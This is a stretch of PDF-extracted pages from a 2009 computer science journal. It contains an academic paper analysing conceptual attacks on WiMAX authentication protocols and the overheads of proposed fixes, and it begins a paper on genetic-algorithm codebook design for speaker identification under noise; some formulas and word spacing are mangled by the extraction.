[14] Y. Wang, G. Attebury, and B. Ramamurthy, “A Survey of SecurityIssues in Wireless Sensor Networks,” IEEE Commun. SurveysTutorials, vol. 8, pp. 2–23, year 2006.
[15] Yun Zhou, Yuguang Fang, Yanchao Zhang, Securing Wireless SensorNetworks: A Survey, IEEE Communications Surveys & Tutorials,year 2008
[16] Xiuli Ren, Security Methods for Wireless Sensor Networks,Proceedings of the 2006 IEEE International Conference on
Mechatronics and Automation , Page: 1925 ,year 2006[17] R. Roman, J. Zhou, and J. Lopez, “On the security of wireless sensor
networks,” in International Conference on Computational Science andIts Applications – ICCSA 2005, May 9-12 2005, vol. 3482 of LectureNotes in Computer Science, (Singapore), pp. 681–690, SpringerVerlag, Heidelberg, D-69121, Germany, 2005.
[18] N. Sastry and D. Wagner, “Security considerations for ieee 802.15.4networks,” in Proceedings of the 2004 ACM workshop on Wirelesssecurity, pp. 32–42, Philadelphia, PA, USA: ACM Press, 2004.
ISSN 1947 5500124
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 131/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
9
[19] L.Weimin, Y.Zongkai, C.Wenqing, T.Yunmeng, Research on TheSecurity in Wireless Sensor Network, Asian Journal of InformationTechnologys, Page(s): 339-345, year 2006
AUTHORS PROFILE
Dr. Padmavathi Ganapathi is the Professor and Head of Department of Computer Science, Avinashilingam University for Women, Coimbatore. Shehas 21 years of teaching experience and one year Industrial experience. Her
areas of interest include Network security and Cryptography and real timecommunication. She has more than 50 publications at national andInternational level. She is a life member of many professional organizationslike CSI, ISTE, AACE, WSEAS, ISCA, and UWA.
Mrs. Shanmugapriya. D, received the B.Sc. and M.Sc. degrees inComputer Science from Avinashilingam University for Women, Coimbatorein 1999 and 2001 respectively. And, she received the M.Phil degree inComputer Science from Manonmaniam Sundaranar University, Thirunelveliin 2003 and pursuing her PhD at Avinashilingam University for Women.She is currently working as a Lecturer in Information Technology in thesame University and has eight years of teaching experience. Her researchinterests are Biometrics, Network Security and System Security.
ISSN 1947 5500125
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 132/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, No. 1, 2009
Computational Complexities and Breaches in
Authentication Frameworksof Broadband Wireless Access (BWA)
Raheel Maqsood Hashmi[1]
, Arooj Mubashara Siddiqui[2]
, Memoona Jabeen[3]
Khurram S. Alimgeer, Shahid A. Khan
Department of Electrical Engineering
COMSATS Institute of Information Technology Islamabad, Pakistan[1]
rahilmh@gmail.com,[2]
aroojmubashara@gmail.com,[3]
memoona.jabeen@gmail.com
Abstract — Secure access of communication networks has become
an increasingly important area of consideration for the
communication service providers of present day. Broadband
Wireless Access (BWA) networks are proving to be an efficient
and cost-effective solution for the provisioning of high rate
wireless traffic links in static and mobile domains. The secure
access of these networks is necessary to ensure their superior
operation and revenue efficacy. Although authentication processis a key to secure access in BWA networks, the breaches present
in them limit the network’s performance. In this paper, the
vulnerabilities in the authentication frameworks of BWA
networks have been unveiled. Moreover, this paper also describes
the limitations of these protocols and of the solutions proposed to
them due to the involved computational complexities and
overheads. The possible attacks on privacy and performance of
BWA networks have been discussed and explained in detail.
Keywords- Comutational Complexity; Authentication; Security;
Privacy; Key Management.
I. I NTRODUCTION
Broadband Wireless Access (BWA) is rapidly emerging as
the standard for future communication networks. The ease of deployment combined with low operational and maintenancecosts makes BWA the preferred choice for moderncommunication service providers. The BWA or WiMAX(World-wide Interoperability for Microwave Access) networkswork on the protocols defined in the IEEE 802.16 standard [1].IEEE 802.16 has two revisions: 802.16d termed as fixedWiMAX and 802.16e termed as mobile WiMAX [2]. Thedeployments of WiMAX networks are growing rapidly toachieve seamless mobility followed by worldwide broadbandcommunications.
Authentication of users and of equipment in the BWAnetwork is done as a part of the admission control process. Theauthentication phase is also carried out while execution of
handoffs in mobile BWA networks. The authentication andservice authorization process is carried out at the privacy sub-layer, embedded in the WiMAX protocol stack [1], [3]. Acomplete protocol ensuring secure distribution andmanagement of keying data between network entities isincorporated in this layer, known as Privacy and KeyManagement protocol (PKM) [1]. Launch of 802.16d in 2004
and 802.16e in 2005 suggests that the standard is in the initial phase of implementation and several dormant issues and shortcomings will be highlighted with progress in deployment andservice provisioning.
Network security and legitimate service access is aconcealed performance indicator in providing Quality of
Service (QoS) to users. In this paper, the pitfalls in the currentauthentication frameworks have been unveiled, the reasons for the breaches have been identified and the causes, beenanalyzed to highlight the limitations of the existing protocols.
Rest of the paper is organized as follows. In Section II, weintroduce the existing authentication frameworks. Section IIIdescribes the attacks on authentication. Section IV highlightsthe computational complexities and overheads involved in theexisting protocols and Section V concludes our discussion.
II. AUTHENTICATION FRAMEWORKS
A. Privacy & Key Management Protocol version 1:
The PKM v1 protocol complies with the 802.16d-2004
standard and is operating in the Fixed WiMAX networks. This protocol is a 3-step protocol involving 1-way authentication.The figure 1 shows the PKM v1 authentication model andmessages involved.
Figure 1. Privacy and Key Management Protocol version 1 [5]
The detailed operation of PKM v1 can be found in [1], [4]and [5]. PKM v1 is based on X.509 certificate based Public
ISSN 1947 5500126
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 133/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, No. 1, 2009
Key Infrastructure (PKI). Figure 1 shows the information flow between Subscriber Station (SS) and Base Station (BS). Theindividual components of the message have been addressed in[1] and [5]. In step 2, a nonce (NSS) is shown which is a 64-bitnumber generated randomly to be used as a message linkingtoken [4]. Basic Connection Identity Code (BCID) is used toidentify a particular node in the network and is assigned to thenode during the admission control process.
B. Privacy &Key Management Protocol version 2:
PKM v2 protocol was defined in 802.16e-2005 and isimplemented in Mobile WiMAX networks. This protocol is notessentially a variant of PKM v1. However, PKM v1 and v2share a common service authorization structure. PKM v2 is a4-step, 3-way authentication protocol. The operationalmechanism of PKM v2 is illustrated in [2] and [6]. Figure 2depicts the PKM v2 authentication framework.
Figure 2. Privacy and Key Management Protocol version 2 [6]
The major enhancements in PKM v2 are the inclusion of digital certificates (DS) and authorization acknowledgementstep. Moreover, except step 1, a nonce (NSS or NBS) has beenincorporated with each message to link successive steps of the protocol.
C. The Time Stamp Authorization (TSA) Model:
This model has been proposed by Sen Xu et al. in [7] andintroduces timestamps to ensure message authenticity. This proposal is a variant of PKM v1 which has timestamps placedon all messages to certify the freshness of the message. Eachnode in the network (BS or SS) maintains a timestamp tablewhich contains the timestamps of all the messages received;therefore, preventing the message replays. Furthermore, a keymanagement strategy for inter-BS key management andexchange has also been proposed along with this protocol in[7]. This model specifically focuses and enhances PKM v1authorization model and is aimed for fixed WiMAX networks.
D. Hybrid Authorization (HA) Model:
Ayesha Altaf et al., in [6], propose a model which employs
a hybrid approach involving nonce and timestamps to prevent
the attacks on privacy and key management protocols. This
proposal claims to cater the effect of interleaving attacks
discussed in [7] and [8] which may occur on PKM v2. The
approach is presented for mobile WiMAX networks and
enhances the PKM v2 authentication framework.
E. Improved Secure Network Authentication Protocol:
This model has been proposed in [4] and aims torestructure the authentication framework by introducing a
single protocol for both fixed and mobile networks. It has been
introduced to cover some of the major threats highlighted in[6], [7] and [9]. Improved Secure Network Authentication
Protocol (ISNAP) has been designed and optimized by
utilizing the existing system resources involving minimum
overhead. The proposed model of ISNAP is shown in figure 3.
Figure 3. Improved Secure Network Authentication Protocol [4]
The detailed structure and working of ISNAP has been
discussed in [4].
III. ATTACKS ON AUTHENTICATION
Attacks on authentication can be described as the ways bywhich a network can be intruded and the privacy of the users be compromised. The secure access of network services is becoming an increasingly important issue in the presentcommunication infrastructures. Any attempts of an interloper to get registered with the network illegitimately or to createchaos in it, is possible; if the user authentication andauthorization stage is compromised. Therefore, the ways to breach the authentication frameworks are termed as attacks on privacy and key management protocols and their variants.
A. Water-Torture Attack:
The Water-Torture attack is aimed to perturb the network’soperation by causing flooding. There are some messages whichare used to initiate cyclic processes when received on any node.Transmission of such a message can be seen in figure 1 and
figure 2 as Mcer SS. Mcer SS is the manufacturer’s X.509certificate which is used by the SS to show its presence in thenetwork and to initiate the authentication protocol [5]. In theadmission control process, the reception of this message at BSinitiates the cyclic authentication procedure. In the event of aWater-Torture attack, these triggering messages are capturedand are transmitted in a loop to cause trigger flooding; thus,
ISSN 1947 5500127
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 134/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, No. 1, 2009
creating artificial congestion at the BS. This attack can beextended to create a management chaos and blocking in thenetwork’s domain, especially, where remote power feeding isemployed. PKM v1 & v2, TSA Model and the HA model areinfluenced by this attack as there is no method to detect if Mcer SS has been transmitted by an authentic SS or has beenreplayed by an intruder.
B. Denial of Service Attack:While dealing with radio frequency networks we come
across certain entities which maintain a cause and effectrelationship between them. The Denial of Service (DoS), inthis case, is one of the results of the Water-Torture attack. Dueto the engaged resources and falsified congestion, the requestsfor authentication, key exchange and securing admission to thenetwork are not entertained. This causes a severe degradationof QoS, therefore, resulting in heavy revenue losses. The protocols subjected to Water-Torture attack are, naturally, alsosubjected to DoS attack.
C. Message Replay Attack:
This attack, under its footprint, covers a large number of
intrusion methods which are based on the employment of thedescribed approach. This attack involves the capturing and re-use of the messages in the authentication cycles. The re-use can be based on a specific message or on a set of messagesexchanged during a complete session. PKM v1 is not supportedwith any mechanism to counter this attack. However, PKM v2 partially counters this attack by employing nonce in message 2and 3 as shown in figure 2. Nonce being a 64-bit randomnumber has (2
64)
-1 probability of repetition and is very difficult
to be predicted. It does prove useful to link subsequentmessages and helps to resolve the replay issues to a partialextent. Hence, PKM v1 is a victim of replay attacks whilePKM v2, partially not completely, is secure. The TSA model proposes timestamps instead of nonce while the HA modeldemands the use of nonce in conjunction with timestamps, but
both models present significant overhead, as discussed in nextsection.
D. Identity Theft:
The SS equipment in the network is provisioned with theservices on the basis of the physical (MAC address) registeredin the network. In case of fixed BWA networks, the MACidentities are registered permanently for each SS, however, inmobile BWA networks, the MAC ID is registered each time anode joins the network or performs handoffs. Hence, PKM v1is not exposed to this attack, but, as in figure 2, PKM v2 andHA model are vulnerable to this attack as message 4 containsMAC identity in both encrypted and unencrypted form. Thereare several devices available at the present day which can be
reprogrammed with variable MAC addresses [6], [9].
E. Impersonation:
Impersonation refers to the type of attack in which one nodemasquerades another node. There are several ways in whichimpersonation can be achieved like by message replay or while
employing one-way authentication [12]. The PKM v1 modeland Time-Stamp authentication model are vulnerable to thistype of infringement attempt. The reason for this is one-wayauthentication i.e., BS authenticates SS but vice versa does notoccur. Moreover, this attack is aimed to compromise thesecurity of the users and poses severe threats in case of employment of BWA infrastructure in security and defenseinstallations for any realm.
F. Interleaving Attack:
Interleaving attack is a sub-class of Man-in-the-Middle
attacks and is specifically aimed for PKM v2. In this attack, an
adversary interleaves a communication session by maintaining
connections with the BS and SS, pertaining as SS to BS and
vice versa. All the information on route passes through the
adversary node and thus an information leakage point is built
[8]. The backbone of interleaving attack is the re-transmission
of a set of messages from the same session. The HA model
proposes an approach to cater the interleaving attack by
introducing transmission and storage overheads in the network
[6].
G. Suppress Replay Attack:This method of gaining forged access to the network
services takes advantage of the fact that perfect
synchronization must be maintained to protect the
authentication session from intrusion. Due to the loss of
synchronization in the clocks of the entities, an intruder can
gain control on the authentication framework by capturing the
messages and transmitting them with added delays, thus
causing forward message replay [6]. This class of attack is
difficult to counter and is vulnerable for the Timestamp
Authentication model. The Hybrid Authentication model can
also be manipulated by this attack.
IV. COMPUTATIONAL COMPLEXITIES AND OVERHEADS
The Timestamp Authentication model, HybridAuthentication Model and ISNAP have been put forth toremove the threats posed to the standardized protocols PKM v1and PKM v2. The first two models focus their predecessors i.e.PKM v1 and PKM v2, respectively, for removal of threats;however, ISNAP focuses on a single solution for fixed andmobile BWA networks, solving the existing problems. The proposed models, along with the enhancements, offer computational complexities and storage overheads as discussedin this section.
A. Timestamp Validation:
The TSA model, HA model and ISNAP model have been
put forth to remove the threats posed to the standardized
protocols PKM v1 and PKM v2. The first two models focustheir predecessors i.e. PKM v1 and PKM v2, respectively, for
removal of threats; however, ISNAP model focuses on a single
solution for fixed and mobile BWA networks, along with
eradication of the posed threats.
ISSN 1947 5500128
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 135/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, No. 1, 2009
Timestamps are freshness guards for messages. These
timestamps, used to eliminate replays, are recorded in
timestamp tables. These tables contain the timestamps for all
the messages previously received and are used to compare the
timestamp of any newly received message with the recorded
ones. The presence of the newly received timestamp in the
tables leads towards the detection of a replay, or otherwise, a
validation of message.
The timestamp tables consume memory for the storage of
prior timestamps from messages and also consume a large
number of computational cycles to compare the arriving
timestamp with the recorded ones. Let ∂ be the number of
bytes in the memory for storage of one timestamp and ρ be the
number of days for which the records are maintained in the
table. Then we have in (1) as:
x∂ x ρ
where χ is storage overhead caused by the timestamp tables
expressed in bytes/node and is the minimum number of
messages exchanged between two communicating nodes per
day. Generally, to counter the replays, timestamp records are
maintained in the tables for an optimum amount of time. Thus,
assuming ∂ and ρ to be 4 bytes (as in a UNIX based
environment) and 15 days, if be a minimum of 100
messages validated per day, the value of χ approaches to 6
Kilobytes to be maintained for each node. Hence for a BS
serving 64 SSs, this can lead to 0.3 Megabytes of minimum
static memory reserved by timestamp tables at each BS.
A very general implementation of timestamp comparison
on UNIX based operating system suggests that a minimum of
2 floating point instructions are used for comparison of one
timestamp. Therefore, the machine cycles for comparison of
the timestamps can be calculated by (2) as:
where α is the number of computational cycles used in the
timestamp validation process. Thus, we can have the number
of floating point instructions per second (FLOPS) in (3) as:
FLOPS = α x (σ)-1
where σ is the number of machine cycles per second for any particular system (SS or BS). The above analysis suggests that
the number of FLOPS used in the timestamp validation
process will be significantly large depending upon the amount
of records maintained and the constriction time required to
counter replay attacks. The final expression for the number of FLOPS becomes:
FLOPSρ.∂)
x (σ)-1
The above analysis suggests that the storage overhead is
quite significant in terms of reserving the memory resources for
any system and can be optimized by enhancement of the
timestamp table comparison method. The proposed models to
rectify the threats discussed in section III, the TSA model and
the HA model, are subject to severe limitations discussed
above. ISNAP model, however, offers the replacement of the
timestamp table method by offering a validation procedure
based on mathematical evaluations [4]. In this case, a
timestamp is subjected to a mathematical condition; if the
condition is fulfilled, the message is validated, else the message
is contradicted. Therefore, ISNAP’s validation procedure
reduces the storage overheads to very considerable limits by
removing the need for maintaining record tables.
B. Transmission Overheads:
In order to minimize the posed threats, different sentinelsare to be introduced in the authentication frameworks. Thisincreases the transmission overhead for the verification procedures; therefore, establishing a cost and benefitrelationship between the security and increased transmission.
Figure 4. Transmission Overheads
Figure 4 shows the comparative transmission overheads of the proposed models with their standardized counterparts.ISNAP model poses lesser transmission than HybridAuthentication model by removing some redundantcomponents like unencrypted MAC ID in the last message. Asfor the TSA model, as it is a variant of PKM v1, the fixednetwork protocol, ISNAP requires substantially moretransmission. However, the cost and benefit relation is justifieddue to the removal of several major attacks in ISNAP andreduction in storage resources.
Combined with overheads involving storage resources and
transmission overheads, the maximum operating cost is offered by the proposed HA model and afterwards TSA Model andISNAP model have comparable outlays. However, based onthe performance of these proposed solutions, ISNAP providesoptimum protection against intrusion and unauthorized use of network resources.
ISSN 1947 5500129
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 136/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, No. 1, 2009
C. Resynchronization Scheme:
The involvement of clock based parameters in
authentication procedures suggests that the clocks of the
involved systems must be well synchronized to allow for a
successful handshake between the intervening nodes. The
synchronization scheme in WiMAX networks has remained an
issue as discussed in [10] and there remains probability of
errors in the clocks [11]; allowing intrusion activity. Althoughthe ISNAP model suggests a solution to this issue, the analysis
and implementation of the synchronization schemes has yet to
be performed to reach a satisfactory conclusion.
D. Initiation of Authentication Procedure:
In PKM v1, PKM v2, Timestamp Authentication Modeland Hybrid Authentication model, the trigger message for initiating the handshake procedure cannot be protected againstthe class of replay attacks. ISNAP model proposes a solution tothis vulnerability but demands the clocks to be synchronized.
V. CONCLUSION
The authentication protocols standardized in the WiMAX
or BWA networks are faced with a number of vulnerabilitieswhich are critical to smooth operation of the network and
demand shear attention. The proposed solutions to the posed
threats have been, up to some extent, successful in sorting out
the issues but not feasible enough in terms of the proposed
complexities and overheads. However, ISNAP model has been
optimum in terms of solving the security issues along with
offering optimized use of resources. Nevertheless,
optimization of operations for validation procedures and finest
use of system resources to furnish secure network access is
required and demands more research in this area.
R EFERENCES
[1] IEEE Computer Society and the IEEE Microwave Theory andTechniques Society, 802.16TM IEEE Standard for local and metropolitan
area networks," Part 16: Air Interface for Fixed Broadband WirelessAccess Systems", June 2004.
[2] IEEE Std. 802.16e/D12, “IEEE Standard for Local and MetropolitanArea Networks, part 16: Air Interface for Fixed and Mobile BroadbandWireless Access Systems”, IEEE Press, 2005.
[3] Jeffrey G. Andrews, Arunabha Ghosh, Rias Muhamed, “Fundamentalsof WiMAX: Understanding Broadband Wireless Networking”, Chapter 9: MAC Layer of WiMAX , Pearson Education Prentice Hall, 2007. ISBN(PDF) 0-13-222552-2
[4] R. M. Hashmi et. al., “Improved Secure Network AuthenticationProtocol (ISNAP) for IEEE 802.16”, Proceedings of 3rd IEEEInternational Conference on Information and CommunicationTechnologies, August 2009.
[5] Sen Xu, Manton Matthews, Chin-Tser Huang. “Security issues in privacy and key management protocols of IEEE 802.16”, Proceedings of the 44th annual Southeast regional conference, pp. 113-118, ISBN 1-59593-315-8, 2006.
[6] Ayesha Altaf, M. Younus Javed, Attiq Ahmed, “Security Enhancementsfor Privacy and Key Management Protocol in IEEE 802.16e-2005”,Proceedings of the 9th ACIS International Conference on softwareEngineering, Artificial Intelligence, Networking and Parallel/DistributedComputing, pp. 335-339, 2008.
[7] Sen Xu, Chin-Tser Huang, “Attacks on PKM Protocols of IEEE 802.16and Its Later Versions”, Computer Science and Engineering Department,University of South Carolina, Columbia, September, 2006.
[8] Gavin Lowe ,”A Family of Attacks upon Authentication
Protocols”, Department of Mathematics and Computer Science,University of Leicester, January, 1997.
[9] Michel Barbeau, “WiMax/802.16 Threat Analysis”, School of Computer Science Carleton University, Ontario, Canada, October, 2005.
[10] Hao Zhou, Amaresh V. Malipatil and Yih-Fang Huang.,“Synchronization issues in OFDM systems”, Circuits and Systems,IEEE-APCCAS, pp. 988 – 991, 2006.
[11] Li Gong , “A Security Risk of depending on Synchronized Clocks”,ORA Corporation and Cornell University, September 24, 1991.
[12] David Johnston, Jesse Walker, “Overview of IEEE 802.16 Security,”IEEE Security & Privacy, June 2004.
AUTHORS PROFILE
Manuscript received 30 July 2009.
Memoona Jabeen completed Electrical Engineering
degree from CIIT, Islamabad, Pakistan in 2009. She has
International Research Publications in the area of Secure
Wireless Access and Cryptographic Methods.
Khurram S. Alimgeer did his Bachelors degree in IT in
2002 and completed his MS in Telecommunications withdistinction in 2006. He has been with Dept. of ElectricalEngineering, CIIT since 2003 and been supervising
extensive research work. Currently, he is AssistantProfessor at CIIT and is also working as doctoral
researcher. His areas of research include Wireless
Communications, Image Processing & Antenna Design.
Arooj M. Siddiqui has done Electrical (Telecom.)
Engineering from Dept. of Electrical Engineering, CIIT,Islamabad in 2009. She is a Graduate Student and
Researcher and has contributed towards the area of
Authentication in BWA Networks.
Raheel M. Hashmi is a graduate student enrolled in MSEngineering at Politecnico di Milano, Italy. He did his
degree in Electrical Engineering from COMSATS
Institute of Information Technology (CIIT), Islamabad in2009 and received Gold Medallion Award. He has
research contributions in the area of Wireless
Networking and Security.
Professor Dr Shahid A. Khan did his Bachelors in
Electrical Engineering in 1988 from UET Taxila. He did
MS Electrical and Electronics Engineering and Ph.D. in
Communications from University of Portsmouth, UK.
Since then, he has been involved in significant R&D
work with research giants like European Antennas Ltd.
UK, Newt International Ltd. UK and WAPDA. He joined CIIT in 2003and is, at present, serving as Dean,
Faculty of Engineering CIIT. He has significant research
contributions to the field of Wireless Networks.
ISSN 1947 5500130
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 137/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1, 2009
Codebook Design Method for Noise Robust
Speaker Identification based on Genetic Algorithm
Md. Rabiul Islam1 1Department of Computer Science & EngineeringRajshahi University of Engineering & Technology
Rajshahi-6204, Bangladesh.
rabiul_cse@yahoo.com
Md. Fayzur Rahman2 2Department of Electrical & Electronic EngineeringRajshahi University of Engineering & Technology
Rajshahi-6204, Bangladesh.
mfrahman3@yahoo.com
Abstract— In this paper, a novel method of designing a codebook
for noise robust speaker identification purpose utilizing Genetic
Algorithm has been proposed. Wiener filter has been used to
remove the background noises from the source speech utterances.
Speech features have been extracted using standard speech
parameterization method such as LPC, LPCC, RCC, MFCC,
ΔMFCC and ΔΔMFCC. For each of these techniques, the
performance of the proposed system has been compared. In this
codebook design method, Genetic Algorithm has the capability of getting global optimal result and hence improves the quality of
the codebook. Comparing with the NOIZEOUS speech database,
the experimental result shows that 79.62 [%] accuracy has been
achieved.
Keywords- Codebook Design; Noise Robust Speaker
Identification; Genetic Algorithm; Speech Pre-processing; Speech
Parameterization.
I. I NTRODUCTION
Speaker Identification is the task of finding the identity of an unknown speaker among a stored database of speakers.There are various techniques to resolve the automatic speaker identification problem [1, 2, 3]. HMM is one of the mostsuccessful classifier for speaker identification system [4, 5]. Toimplement the speaker identification system in real timeenvironment, codebook design is essential. The LBG algorithmis most popular to design the codebook due to its simplicity [6].But the limitations of the LBG algorithm are the local optimal
problem and its low speed. It is slow because for each iteration,determination of each cluster requires that each input vector becompared with all the codewords in the codebook. There wereanother methods such as modified K-means (MKM) algorithm[7], designing codewords from the trained vectors of each
phoneme and grouping them together into a single codebook [8] etc. In codebook design, the above methods perform well innoiseless environments but the system performance degradesunder noisy environments.
This paper deals the efficient approach for implementingthe codebook design method for HMM based real time close-set text-dependent speaker identification system under noisyenvironments. To remove the background noise from thespeech, wiener filter has been used. Efficient speech pre-
processing techniques and different feature extractiontechniques have been considered to improve the performance
of this proposed noise robust codebook design method for speaker identification.
II. SYSTEM OVERVIEW
The proposed codebook design method can be divided intotwo operations. One is the encoder and another is the decoder.The encoder takes the input speech utterance and outputs theindex of the codeword considering the minimum distortion. Tofind out the minimum distortion, different types of geneticalgorithm operations have been used. In decoding phase, whenthe decoder receives the index then it translates the index to itsassociate speaker utterance. Fig. 1 shows the block diagram of this proposed codebook design method.
Figure 1. Paradigm of the proposed codebook design method.
III. SPEECH SIGNAL PRE-PROCESSING
To capture the speech signal, sampling frequency of 11025HZ, sampling resolution of 16-bits, mono recording channel andRecorded file format = *.wav have been considered. The
speech preprocessing part has a vital role for the efficiency of learning. After acquisition of speech utterances, winner filter has been used to remove the background noise from theoriginal speech utterances [9, 10, 11]. Speech end pointsdetection and silence part removal algorithm has been used todetect the presence of speech and to remove pulse and silencesin a background noise [12, 13, 14, 15, 16]. To detect word
boundary, the frame energy is computed using the sort-term logenergy equation [17],
ISSN 1947 5500131
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 138/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1, 2009
∑−+
=
=1
2 )(log10 N n
nt
i
i
i
t S E (1)
Pre-emphasis has been used to balance the spectrum of voiced sounds that have a steep roll-off in the high frequencyregion [18, 19, 20]. The transfer function of the FIR filter in thez-domain is [19],
10,.1)( 1 ≤≤−= −α α z Z H (2)
Where α is the pre-emphasis parameter.
Frame blocking has been performed with an overlapping of 25% to 75% of the frame size. Typically a frame length of 10-30 milliseconds has been used. The purpose of the overlappinganalysis is that each speech sound of the input sequence would
be approximately centered at some frame [21, 22].
From different types of windowing techniques, Hammingwindow has been used for this system. The purpose of using
windowing is to reduce the effect of the spectral artifacts thatresults from the framing process [23, 24, 25]. The hammingwindow can be defined as follows [26]:
Otherwise ,0
)2
1()
2
1( ,
2cos46.054.0
)(⎪⎩
⎪⎨⎧ −
≤≤−
−Π
−= N
n N
N
n
nw (3)
IV. SPEECH PARAMETERIZATION
This stage is very important in an ASIS because the qualityof the speaker modeling and pattern matching strongly dependson the quality of the feature extraction methods. For the
proposed ASIS, different types of speech feature extractionmethods [27, 28, 29, 30, 31, 32] such as RCC, MFCC,ΔMFCC, ΔΔMFCC, LPC, LPCC have been applied.
V. SPEECH PARAMETERIZATION
Genetic Algorithm [33, 34, 35, 36] has been applied in twoways for the encoding and decoding purposes. On encoding,every speaker utterance is compared with an environmentalnoise utterance and made some groups. In each group, oneutterance is selected which is defined as the codeword of thatgroup. As a result of encoding, some groups have been definedand one speaker utterance will lead one group. On decodingside, when unknown speaker utterance comes to the system
then it is matched with a leading utterance. The unknownutterance will then find out within that selected group.
In GA processing selection, crossover and mutationoperators have been used here. The fitness function isexpressed as follows:
Fitness = (Unknown speech × Each stored speech) (4)
In the recognition phase, for each unknown group andspeaker within the group to be recognized, the processingshown in Fig. 2 has been carried out.
Figure 2. Recognition model on Genetic Algorithm.
VI. OPTIMUM PARAMETER SELECTION ON GENETIC
ALGORITHM
A. Experiment on the Crossover Rate
The identification rate has been measured according to thevarious crossover rates. Fig. 3 shows the comparison amongresults of different crossover rates. It is shown that the highestidentification rate of 87.00 [%] was achieved at crossover rate
5.
Figure 3. Performance comparison among different crossover rate.
B. Experiment on the No. of Generations
The number of generations has also been varied to measurethe best performance of this codebook design method.According to the number of generation 5, 10 and 20 (withcrossover rate 5), a comparative identification rate was found
ISSN 1947 5500132
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 139/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1, 2009
which is shown in Fig. 4. When the comparison is continued upto 5th generation, highest speaker identification rate of 93.00[%] was achieved.
Figure 4. Performance comparison among various numbers of generations.
VII. PERFORMANCE A NALYSIS OF THE PROPOSED
CODEBOOK DESIGN METHOD
The optimal values of the critical parameters of the GA arechosen carefully according to various experiments. In noiselessenvironment, the crossover rate and number of generation have
been found to be 5 for both. The performance analysis has beencounted according to the text-dependent speaker identificationsystem.
To measure the performance of the proposed system, NOIZEOUS speech database [37, 38] has been used. In NOIZEOUS speech database, eight different types of environmental noises (i.e. Airport, Babble, Car, ExhibitionHall, Restaurant, Street, Train and Train station) have beenconsidered with four different SNRs such as 0dB, 5dB, 10dBand 15dB. All of the environmental conditions and SNRs have
been accounted on the following experimental analysis.
TABLE I. AIRPORT NOISE AVERAGE IDENTIFICATION R ATE (%) FOR
NOIZEOUS SPEECH CORPUS
Method
SNRMFCC ΔMFCC ΔΔMFCC RCC LPCC
15dB 89.00 86.33 63.33 65.33 75.67
10dB 86.00 84.43 58.43 60.43 69.33
5dB 75.33 81.00 50.33 60.33 60.43
0dB 68.89 75.29 43.33 56.17 58.29
Average 79.81 81.76 53.86 60.57 65.93
TABLE II. BABBLE NOISE AVERAGE IDENTIFICATION R ATE (%) FOR
NOIZEOUS SPEECH CORPUS
Method
SNRMFCC ΔMFCC ΔΔMFCC RCC LPCC
15dB 80.00 90.00 63.33 63.33 76.67
10dB 76.67 86.67 53.33 56.67 70.00
5dB 63.33 73.33 46.67 56.67 70.00
0dB 73.33 63.33 46.67 53.33 63.33
Average 73.33 78.33 52.50 57.50 70.00
TABLE III. CAR NOISE AVERAGE IDENTIFICATION R ATE (%) FOR
NOIZEOUS SPEECH CORPUS
Method
SNRMFCC ΔMFCC ΔΔMFCC RCC LPCC
15dB 76.67 89.43 63.33 73.33 76.67
10dB 73.33 83.67 53.33 63.33 70.00
5dB 63.33 73.33 53.33 63.33 70.00
0dB 63.33 63.33 46.67 53.33 60.00
Average 69.17 77.44 54.17 63.33 69.17
TABLE IV. EXHIBITION HALL NOISE AVERAGE IDENTIFICATION R ATE
(%) FOR NOIZEOUS SPEECH CORPUS
Method
SNRMFCC ΔMFCC ΔΔMFCC RCC LPCC
15dB 90.00 91.67 76.67 80.00 87.67
10dB 83.33 83.33 63.33 76.67 76.67
5dB 76.67 80.00 76.67 76.67 73.33
0dB 73.33 76.67 53.33 63.33 70.00
Average 80.83 82.92 67.50 74.17 76.92
TABLE V. R ESTAURANT NOISE AVERAGE IDENTIFICATION R ATE (%) FOR NOIZEOUS SPEECH CORPUS
Method
SNRMFCC ΔMFCC ΔΔMFCC RCC LPCC
15dB 85.00 91.00 53.33 83.33 83.33
10dB 80.00 80.00 53.33 76.67 73.33
5dB 73.33 76.67 50.43 63.33 73.33
0dB 60.00 65.33 46.67 63.33 63.33
Average 74.58 78.25 50.94 71.67 73.33
TABLE VI. STREET NOISE AVERAGE IDENTIFICATION R ATE (%) FOR
NOIZEOUS SPEECH CORPUS
Method
SNR
MFCC ΔMFCC ΔΔMFCC RCC LPCC
15dB 83.33 90.00 63.33 76.67 83.33
10dB 76.67 80.00 56.67 63.33 73.33
5dB 73.33 76.67 53.33 76.67 73.33
0dB 63.33 73.33 46.67 63.33 63.33
Average 74.17 80.00 55.00 70.00 73.33
TABLE VII. TRAIN NOISE AVERAGE IDENTIFICATION R ATE (%) FOR
NOIZEOUS SPEECH CORPUS
Method
SNRMFCC ΔMFCC ΔΔMFCC RCC LPCC
15dB 90.00 91.33 63.33 73.33 85.00
10dB 80.00 85.00 53.33 70.00 76.67
5dB 66.67 86.67 53.33 63.33 63.33
0dB 66.67 73.33 46.67 66.67 63.33
Average 75.84 84.08 54.17 68.33 72.08
ISSN 1947 5500133
8/14/2019 International Journal of computer science and Information Security
